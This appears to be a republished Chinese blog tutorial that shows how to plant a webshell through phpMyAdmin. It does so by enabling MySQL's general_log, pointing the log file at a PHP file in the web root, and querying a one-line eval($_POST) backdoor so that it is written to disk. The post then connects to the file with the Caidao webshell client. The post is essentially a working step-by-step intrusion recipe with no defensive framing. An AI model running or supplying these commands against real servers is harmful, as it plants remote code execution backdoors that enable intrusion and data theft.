通过phpMyAdmin拿webshell

Posted Sch01aR#

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了通过phpMyAdmin拿webshell相关的知识,希望对你有一定的参考价值。

general_log默认为关闭的,root权限开启后,general_log_file会保存所有的查询语句

所以可以开启general_log,然后设置general_log_file为一个php文件,最后用一句话木马进行查询来获取webshell

进入phpMyAdmin后在SQL处执行SQL语句

首先查看general log是否开启

show variables like \'general_log\';

general log是关闭状态,执行SQL语句开启general log

set global general_log=on;

开启成功

然后把general_log_file设置为shell的绝对路径

SET global general_log_file=\'C:/phpStudy/PHPTutorial/WWW/x.php\';

创建的x.php里的内容

然后执行SQL查询语句

SELECT \'<?php @eval($_POST["x"]);?>\';

执行成功

看一下x.php里的内容

成功插入了一句话木马

用菜刀连接,看看是否能够解析的

 

连接成功

以上是关于通过phpMyAdmin拿webshell的主要内容,如果未能解决你的问题,请参考以下文章

普通权限拿webshell

phpMyadmin日志写入webshell

进入网站后台 怎么入侵网站拿shell??

通过phpmyphp拿下webshell

如何用一句话对ewebeditor拿webshell

数据库备份拿webshell简单记录